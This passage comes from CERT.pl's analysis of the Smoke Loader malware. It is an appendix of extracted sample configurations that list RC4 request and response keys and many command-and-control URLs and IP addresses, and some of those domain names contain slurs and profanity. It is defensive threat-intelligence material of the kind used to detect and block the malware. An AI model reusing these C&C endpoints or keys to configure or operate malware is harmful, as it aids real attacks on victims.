u'http://flockwindue.com/'},\r\n{u'cnc': u'http://energybootwin.com/'}, {u'cnc': u'http://troughtnight.com/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 50 of 63\n\n[(u'smk_magic', 2015), (u'sample_id', u'tar12'), (u'domains', [{u'cnc': u'http://flockwindue.com/'},\r\n{u'cnc': u'http://energybootwin.com/'}, {u'cnc': u'http://troughtnight.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'tar13'), (u'domains', [{u'cnc': u'http://flockwindue.com/'},\r\n{u'cnc': u'http://energybootwin.com/'}, {u'cnc': u'http://troughtnight.com/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x1079f663'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://a11t01t22t10.ru/'}, {u'cnc': u'http://ebandos.bit/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x147714d9'), (u'rc4_key_req',\r\nu'0x78130029'), (u'domains', [{u'cnc': u'http://cd1213.top/s/'}, {u'cnc': u'http://xdnzzz.top/s/'}, {u'cnc':\r\nu'http://x0x0x0x.top/s/'}, {u'cnc': u'http://xrdk013.top/s/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x2744f14e'), (u'rc4_key_req',\r\nu'0x4c7e54de'), (u'domains', [{u'cnc': u'http://contsernmayakinternacional.ru/'}, {u'cnc':\r\nu'http://soyuzinformaciiimexanikiops.com/'}, {u'cnc': u'http://kantslerinborisinafrolova.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x36fdc6c9'), (u'rc4_key_req',\r\nu'0x4003ea'), (u'domains', [{u'cnc': u'http://193.0.178.39/'}, {u'cnc': u'http://resvzone.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x38c2858e'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://newtryguys.win/'}, {u'cnc': u'http://shadowaproch.win/'},\r\n{u'cnc': u'http://thenewthing.online/'}, {u'cnc': u'http://meemsaas.site/'}, {u'cnc': u'http://sossen.site/'},\r\n{u'cnc': u'http://bumdid.site/'}, {u'cnc': u'http://youhap.online/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x3db17409'), (u'rc4_key_req',\r\nu'0x83e9f57c'), (u'domains', [{u'cnc': u'http://hronicle.pw/tempo/'}, {u'cnc':\r\nu'http://hronicle.pw/tempo/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x4785b9c9'), (u'rc4_key_req',\r\nu'0xbf993ae2'), (u'domains', [{u'cnc': u'http://21072206.ru/'}, {u'cnc': u'http://backup21072206.ru/'},\r\n{u'cnc': u'http://jiangwei.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x545a94f6'), (u'rc4_key_req',\r\nu'0x6e36b088'), (u'domains', [{u'cnc': u'http://circlesouthernbox.tk/'}, {u'cnc':\r\nu'http://circlesouthernbox.ml/'}, {u'cnc': u'http://circlesouthernbox.ga/'}, {u'cnc':\r\nu'http://circlesouthernbox.cf/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x63b39d60'), (u'rc4_key_req',\r\nu'0x8ea8a1f'), (u'domains', [{u'cnc': u'http://xcols.bit/1/'}, {u'cnc': u'http://siled.bit/1/'}, {u'cnc':\r\nu'http://ds12.ng/1/'}, {u'cnc': u'http://d3s1.me/1/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x6644028c'), (u'rc4_key_req',\r\nu'0x77284a3a'), (u'domains', [{u'cnc': u'http://oftleda.win/'}, {u'cnc': u'http://oftleda.win/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x69172b96'), (u'rc4_key_req',\r\nu'0x4c7e54de'), (u'domains', [{u'cnc': u'http://bbank.bit/'}, {u'cnc': u'http://abank.bit/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x6a01cb31'), (u'rc4_key_req',\r\nu'0x39e825d6'), (u'domains', [{u'cnc': u'http://vizereo.win/'}, {u'cnc': u'http://vizereo.win/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 51 of 63\n\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x7b439174'), (u'rc4_key_req',\r\nu'0x1b0e0627'), (u'domains', [{u'cnc': u'http://musicstreaming.at/dance/'}, {u'cnc':\r\nu'http://ravepartypodcast.at/dance/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x8ba37e0b'), (u'rc4_key_req',\r\nu'0xb6f34126'), (u'domains', [{u'cnc': u'https://czancovene.top/feedweb/feed.php'}, {u'cnc':\r\nu'https://niellypote.top/feedweb/feed.php'}, {u'cnc': u'https://hoarpstise.top/feedweb/feed.php'},\r\n{u'cnc': u'https://rhautarama.top/feedweb/feed.php'}, {u'cnc':\r\nu'https://scetregano.top/feedweb/feed.php'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x8e376d2f'), (u'rc4_key_req',\r\nu'0xc33c4e12'), (u'domains', [{u'cnc': u'http://knowdaro.com/list/shop/'}, {u'cnc':\r\nu'http://winbiter.com/list/shop/'}, {u'cnc': u'http://ertunda.com/list/shop/'}, {u'cnc':\r\nu'http://sharemanc.com/list/shop/'}, {u'cnc': u'http://swipnew.com/list/shop/'}, {u'cnc':\r\nu'http://armznet.com/list/shop/'}, {u'cnc': u'http://pewhuman.com/list/shop/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x9dd2d710'), (u'rc4_key_req',\r\nu'0xdba3ec17'), (u'domains', [{u'cnc': u'http://trainwreck.dyndns.ws/'}, {u'cnc':\r\nu'http://trainwreck.dyndns.ws/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0x9df8c1ed'), (u'rc4_key_req',\r\nu'0x88cd9b89'), (u'domains', [{u'cnc': u'http://digitaltraders17.info/'}, {u'cnc': u'http://iccann.bit/'},\r\n{u'cnc': u'http://smokeit.bit/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xa0567c9e'), (u'rc4_key_req',\r\nu'0xc90e7080'), (u'domains', [{u'cnc': u'http://domhoappst.xyz/'}, {u'cnc': u'http://domhoappst.xyz/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xae0f8428'), (u'rc4_key_req',\r\nu'0xd9be48d2'), (u'domains', [{u'cnc': u'http://systemupdate.bit/'}, {u'cnc': u'http://zenithair.bit/'},\r\n{u'cnc': u'http://horsestr.bit/'}, {u'cnc': u'http://changeqrs.bit/'}, {u'cnc': u'http://asomechancms.com/'},\r\n{u'cnc': u'http://ustreetnsnow.com/'}, {u'cnc': u'http://learquickzlx.com/'}, {u'cnc':\r\nu'http://stopwhatdnxbc.com/'}, {u'cnc': u'http://desktoponqrs.com/'}, {u'cnc':\r\nu'http://green2globeams.com/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xbe6b0e7d'), (u'rc4_key_req',\r\nu'0xf115307e'), (u'domains', [{u'cnc': u'http://imanigger123f.online/cock/'}, {u'cnc':\r\nu'http://dontgiveafucknymore.su/cock/'}, {u'cnc': u'http://hackhackerhack3.bid/cock/'}, {u'cnc':\r\nu'http://dontfuckinghackme2.win/cock/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xc502b4ef'), (u'rc4_key_req',\r\nu'0xf855bcfd'), (u'domains', [{u'cnc': u'http://gickmarket.ru/'}, {u'cnc': u'http://24resv.ru/'}, {u'cnc':\r\nu'http://resvonline.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xdfa88d40'), (u'rc4_key_req',\r\nu'0xfe3c1254'), (u'domains', [{u'cnc': u'http://bookwormsbiorhythm.top/'}, {u'cnc':\r\nu'http://bottleneckkendricks.top/'}, {u'cnc': u'http://counterrevolutionarysbackslappers.top/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xf3ccedb9'), (u'rc4_key_req',\r\nu'0xb0baceb1'), (u'domains', [{u'cnc': u'http://weeklypost.bid/'}, {u'cnc':\r\nu'http://windowsnamepool.stream/'}, {u'cnc': u'http://appleadslog.trade/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 52 of 63\n\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://boboxmr.ru/'}, {u'cnc': u'http://boboboxmr.ru/'}, {u'cnc':\r\nu'http://boboboboxmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://bomonero.su/'}, {u'cnc': u'http://monerobo.su/'}, {u'cnc':\r\nu'http://bomonero2.su/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://cb2017.ru/'}, {u'cnc': u'http://2017cb.ru/'}, {u'cnc':\r\nu'http://cb17.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay2.ru/'}, {u'cnc': u'http://ngay210.ru/'}, {u'cnc':\r\nu'http://ngay21017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u''), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay26.ru/'}, {u'cnc': u'http://ngay2610.ru/'}, {u'cnc':\r\nu'http://ngay261017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'0'), (u'rc4_key_resp', u'0x18ca45cb'), (u'rc4_key_req',\r\nu'0x18ca45cb'), (u'domains', [{u'cnc': u'http://dogewareservice.ru/'}, {u'cnc':\r\nu'http://dogewareservice.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'0'), (u'rc4_key_resp', u'0x41cacab6'), (u'rc4_key_req',\r\nu'0x6992c2cf'), (u'domains', [{u'cnc': u'http://dogewareservice.ru/'}, {u'cnc':\r\nu'http://dogewareservice.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'00000'), (u'rc4_key_resp', u'0x4785b9c9'), (u'rc4_key_req',\r\nu'0xbf993ae2'), (u'domains', [{u'cnc': u'http://21072206.ru/'}, {u'cnc': u'http://backup21072206.ru/'},\r\n{u'cnc': u'http://jiangwei.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'0207'), (u'rc4_key_resp', u'0x81badb3d'), (u'rc4_key_req',\r\nu'0x18888780'), (u'domains', [{u'cnc': u'http://requiremed.com/'}, {u'cnc': u'http://epochtitle.com/'},\r\n{u'cnc': u'http://modifican.com/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'11111'), (u'rc4_key_resp', u'0x4785b9c9'), (u'rc4_key_req',\r\nu'0xbf993ae2'), (u'domains', [{u'cnc': u'http://21072206.ru/'}, {u'cnc': u'http://backup21072206.ru/'},\r\n{u'cnc': u'http://jiangwei.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'11111'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay2.ru/'}, {u'cnc': u'http://ngay210.ru/'}, {u'cnc':\r\nu'http://ngay21017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'https://reterbawax.top/feedweb/feed.php'}, {u'cnc': u'https://irveneloni.info/feedweb/feed.php'},\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 53 of 63\n\n{u'cnc': u'https://zelispecto.top/feedweb/feed.php'}, {u'cnc':\r\nu'https://nyminalowe.info/feedweb/feed.php'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x147714d9'), (u'rc4_key_req',\r\nu'0x78130029'), (u'domains', [{u'cnc': u'http://cd1213.top/s/'}, {u'cnc': u'http://xdnzzz.top/s/'}, {u'cnc':\r\nu'http://x0x0x0x.top/s/'}, {u'cnc': u'http://xrdk013.top/s/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x23b811eb'), (u'rc4_key_req',\r\nu'0x69d54590'), (u'domains', [{u'cnc': u'http://gdeheehwjwjsheej.com/'}, {u'cnc':\r\nu'http://usuahwywytggahjjdd.com/'}, {u'cnc': u'http://visiwsusnsjsjsss.com/'}, {u'cnc':\r\nu'http://dhddhdhdhddhuuhshshs.com/'}, {u'cnc': u'http://ushehehehshshhs.com/'}, {u'cnc':\r\nu'http://hdhdhehehshees.com/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x2744f14e'), (u'rc4_key_req',\r\nu'0x4c7e54de'), (u'domains', [{u'cnc': u'http://contsernmayakinternacional.ru/'}, {u'cnc':\r\nu'http://soyuzinformaciiimexanikiops.com/'}, {u'cnc': u'http://kantslerinborisinafrolova.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x301b68d2'), (u'rc4_key_req',\r\nu'0x2527eef'), (u'domains', [{u'cnc': u'http://7atsud.top/'}, {u'cnc': u'http://7sa86d8as.top/'}, {u'cnc':\r\nu'http://ia6s5a.top/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x36fdc6c9'), (u'rc4_key_req',\r\nu'0x4003ea'), (u'domains', [{u'cnc': u'http://193.0.178.39/'}, {u'cnc': u'http://resvzone.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x39f8ae4b'), (u'rc4_key_req',\r\nu'0x48e5c058'), (u'domains', [{u'cnc': u'http://q666.ru/'}, {u'cnc': u'http://q777.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x3db17409'), (u'rc4_key_req',\r\nu'0x83e9f57c'), (u'domains', [{u'cnc': u'http://hronicle.pw/tempo/'}, {u'cnc':\r\nu'http://hronicle.pw/tempo/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x49ce9b96'), (u'rc4_key_req',\r\nu'0x64fe93eb'), (u'domains', [{u'cnc': u'http://2gillick.com/red2/html/fi/'}, {u'cnc':\r\nu'http://2ancisco.net/s/bond/'}, {u'cnc': u'http://hunemar9.org/lif2/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x4ebd6e79'), (u'rc4_key_req',\r\nu'0xa80f1679'), (u'domains', [{u'cnc': u'http://185.188.205.3/vxvxawlk/'}, {u'cnc':\r\nu'http://185.188.205.3/vxvxawlk/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x545a94f6'), (u'rc4_key_req',\r\nu'0x6e36b088'), (u'domains', [{u'cnc': u'http://circlesouthernbox.tk/'}, {u'cnc':\r\nu'http://circlesouthernbox.ml/'}, {u'cnc': u'http://circlesouthernbox.ga/'}, {u'cnc':\r\nu'http://circlesouthernbox.cf/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x63b39d60'), (u'rc4_key_req',\r\nu'0x8ea8a1f'), (u'domains', [{u'cnc': u'http://xcols.bit/1/'}, {u'cnc': u'http://siled.bit/1/'}, {u'cnc':\r\nu'http://ds12.ng/1/'}, {u'cnc': u'http://d3s1.me/1/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x6644028c'), (u'rc4_key_req',\r\nu'0x77284a3a'), (u'domains', [{u'cnc': u'http://oftleda.win/'}, {u'cnc': u'http://oftleda.win/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 54 of 63\n\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x69172b96'), (u'rc4_key_req',\r\nu'0x4c7e54de'), (u'domains', [{u'cnc': u'http://bbank.bit/'}, {u'cnc': u'http://abank.bit/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x6a01cb31'), (u'rc4_key_req',\r\nu'0x39e825d6'), (u'domains', [{u'cnc': u'http://vizereo.win/'}, {u'cnc': u'http://vizereo.win/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x751242'), (u'rc4_key_req',\r\nu'0x78130029'), (u'domains', [{u'cnc': u'http://www.ax0ax0ax0.xyz/s/'}, {u'cnc':\r\nu'http://www.ax0ax0ax0.top/s/'}, {u'cnc': u'http://www.ax0ax0ax0.gdn/s/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x7b439174'), (u'rc4_key_req',\r\nu'0x1b0e0627'), (u'domains', [{u'cnc': u'http://musicstreaming.at/dance/'}, {u'cnc':\r\nu'http://ravepartypodcast.at/dance/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x7fd9c1f2'), (u'rc4_key_req',\r\nu'0x4c7e54de'), (u'domains', [{u'cnc': u'http://porohforeveyoung.ru/'}, {u'cnc':\r\nu'http://kantslerinborisinafrolova.ru/'}, {u'cnc': u'http://petropershiyinukra.com/'}, {u'cnc':\r\nu'http://versalinthechipolino.net/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x8ba37e0b'), (u'rc4_key_req',\r\nu'0xb6f34126'), (u'domains', [{u'cnc': u'https://czancovene.top/feedweb/feed.php'}, {u'cnc':\r\nu'https://niellypote.top/feedweb/feed.php'}, {u'cnc': u'https://hoarpstise.top/feedweb/feed.php'},\r\n{u'cnc': u'https://rhautarama.top/feedweb/feed.php'}, {u'cnc':\r\nu'https://scetregano.top/feedweb/feed.php'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x8e376d2f'), (u'rc4_key_req',\r\nu'0xc33c4e12'), (u'domains', [{u'cnc': u'http://knowdaro.com/list/shop/'}, {u'cnc':\r\nu'http://winbiter.com/list/shop/'}, {u'cnc': u'http://ertunda.com/list/shop/'}, {u'cnc':\r\nu'http://sharemanc.com/list/shop/'}, {u'cnc': u'http://swipnew.com/list/shop/'}, {u'cnc':\r\nu'http://armznet.com/list/shop/'}, {u'cnc': u'http://pewhuman.com/list/shop/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x9dd2d710'), (u'rc4_key_req',\r\nu'0xdba3ec17'), (u'domains', [{u'cnc': u'http://trainwreck.dyndns.ws/'}, {u'cnc':\r\nu'http://trainwreck.dyndns.ws/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0x9df8c1ed'), (u'rc4_key_req',\r\nu'0x88cd9b89'), (u'domains', [{u'cnc': u'http://digitaltraders17.info/'}, {u'cnc': u'http://iccann.bit/'},\r\n{u'cnc': u'http://smokeit.bit/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0xa383d412'), (u'rc4_key_req',\r\nu'0x83e9f57c'), (u'domains', [{u'cnc': u'http://annonn.gdn/tehnogen/goodsman.php'}, {u'cnc':\r\nu'http://annonn.gdn/tehnogen/goodsman.php'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0xae0f8428'), (u'rc4_key_req',\r\nu'0xd9be48d2'), (u'domains', [{u'cnc': u'http://systemupdate.bit/'}, {u'cnc': u'http://zenithair.bit/'},\r\n{u'cnc': u'http://horsestr.bit/'}, {u'cnc': u'http://changeqrs.bit/'}, {u'cnc': u'http://asomechancms.com/'},\r\n{u'cnc': u'http://ustreetnsnow.com/'}, {u'cnc': u'http://learquickzlx.com/'}, {u'cnc':\r\nu'http://stopwhatdnxbc.com/'}, {u'cnc': u'http://desktoponqrs.com/'}, {u'cnc':\r\nu'http://green2globeams.com/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 55 of 63\n\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0xb1670149'), (u'rc4_key_req',\r\nu'0xc60d5618'), (u'domains', [{u'cnc': u'http://cassocial.gdn/'}, {u'cnc': u'http://variiform.gdn/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0xc502b4ef'), (u'rc4_key_req',\r\nu'0xf855bcfd'), (u'domains', [{u'cnc': u'http://gickmarket.ru/'}, {u'cnc': u'http://24resv.ru/'}, {u'cnc':\r\nu'http://resvonline.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0xf0c76d81'), (u'rc4_key_req',\r\nu'0xb6f34126'), (u'domains', [{u'cnc': u'https://uppedutari.com/feedweb/feed.php'}, {u'cnc':\r\nu'https://reterbawax.top/feedweb/feed.php'}, {u'cnc': u'https://irveneloni.info/feedweb/feed.php'},\r\n{u'cnc': u'https://zelispecto.top/feedweb/feed.php'}, {u'cnc':\r\nu'https://nyminalowe.info/feedweb/feed.php'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0xf592f2b3'), (u'rc4_key_req',\r\nu'0xa68549bd'), (u'domains', [{u'cnc': u'http://zabugrom.bit/smk2/'}, {u'cnc':\r\nu'http://zabugor.bit/smk2/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'12345'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://boboxmr.ru/'}, {u'cnc': u'http://boboboxmr.ru/'}, {u'cnc':\r\nu'http://boboboboxmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'1809'), (u'rc4_key_resp', u'0xfbbccef9'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://xmrbl.ru/'}, {u'cnc': u'http://xmrld.ru/'}, {u'cnc':\r\nu'http://xmrvn.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'2'), (u'rc4_key_resp', u'0x3d187'), (u'rc4_key_req',\r\nu'0xa2cc918d'), (u'domains', [{u'cnc': u'http://108.61.199.175/'}, {u'cnc': u'http://host.pdns.cz/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'2206'), (u'rc4_key_resp', u'0x4785b9c9'), (u'rc4_key_req',\r\nu'0xbf993ae2'), (u'domains', [{u'cnc': u'http://21072206.ru/'}, {u'cnc': u'http://backup21072206.ru/'},\r\n{u'cnc': u'http://jiangwei.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'22222'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://ngay2.ru/'}, {u'cnc': u'http://ngay210.ru/'}, {u'cnc':\r\nu'http://ngay21017.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'4953'), (u'rc4_key_resp', u'0x4785b9c9'), (u'rc4_key_req',\r\nu'0xbf993ae2'), (u'domains', [{u'cnc': u'http://21072206.ru/'}, {u'cnc': u'http://backup21072206.ru/'},\r\n{u'cnc': u'http://jiangwei.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'55555'), (u'rc4_key_resp', u'0x4785b9c9'), (u'rc4_key_req',\r\nu'0xbf993ae2'), (u'domains', [{u'cnc': u'http://21072206.ru/'}, {u'cnc': u'http://backup21072206.ru/'},\r\n{u'cnc': u'http://jiangwei.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'7777'), (u'rc4_key_resp', u'0x1079f663'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://a11t01t22t10.ru/'}, {u'cnc': u'http://ebandos.bit/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 56 of 63\n\n[(u'smk_magic', 2017), (u'sample_id', u'a0117'), (u'rc4_key_resp', u'0xf3ccedb9'), (u'rc4_key_req',\r\nu'0xb0baceb1'), (u'domains', [{u'cnc': u'http://weeklypost.bid/'}, {u'cnc':\r\nu'http://windowsnamepool.stream/'}, {u'cnc': u'http://appleadslog.trade/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'agr01'), (u'rc4_key_resp', u'0xae0f8428'), (u'rc4_key_req',\r\nu'0xd9be48d2'), (u'domains', [{u'cnc': u'http://systemupdate.bit/'}, {u'cnc': u'http://zenithair.bit/'},\r\n{u'cnc': u'http://horsestr.bit/'}, {u'cnc': u'http://changeqrs.bit/'}, {u'cnc': u'http://asomechancms.com/'},\r\n{u'cnc': u'http://ustreetnsnow.com/'}, {u'cnc': u'http://learquickzlx.com/'}, {u'cnc':\r\nu'http://stopwhatdnxbc.com/'}, {u'cnc': u'http://desktoponqrs.com/'}, {u'cnc':\r\nu'http://green2globeams.com/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'agr02'), (u'rc4_key_resp', u'0xae0f8428'), (u'rc4_key_req',\r\nu'0xd9be48d2'), (u'domains', [{u'cnc': u'http://systemupdate.bit/'}, {u'cnc': u'http://zenithair.bit/'},\r\n{u'cnc': u'http://horsestr.bit/'}, {u'cnc': u'http://changeqrs.bit/'}, {u'cnc': u'http://asomechancms.com/'},\r\n{u'cnc': u'http://ustreetnsnow.com/'}, {u'cnc': u'http://learquickzlx.com/'}, {u'cnc':\r\nu'http://stopwhatdnxbc.com/'}, {u'cnc': u'http://desktoponqrs.com/'}, {u'cnc':\r\nu'http://green2globeams.com/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'BIN10'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'cocks'), (u'rc4_key_resp', u'0x8cdecf96'), (u'rc4_key_req',\r\nu'0xd0b0e18e'), (u'domains', [{u'cnc': u'http://hellobro.bit/'}, {u'cnc': u'http://hellobro.bit/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'DAY06'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'DAY09'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'Day10'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'DAY21'), (u'rc4_key_resp', u'0xfe8ea7f3'), (u'rc4_key_req',\r\nu'0xbfe387ca'), (u'domains', [{u'cnc': u'http://1101xmr.ru/'}, {u'cnc': u'http://2210xmr.ru/'}, {u'cnc':\r\nu'http://2017xmr.ru/'}])]\r\n[(u'smk_magic', 2017), (u'sample_id', u'DAY26'), (u'rc4_key_resp', u'0xfe8ea7f3'), 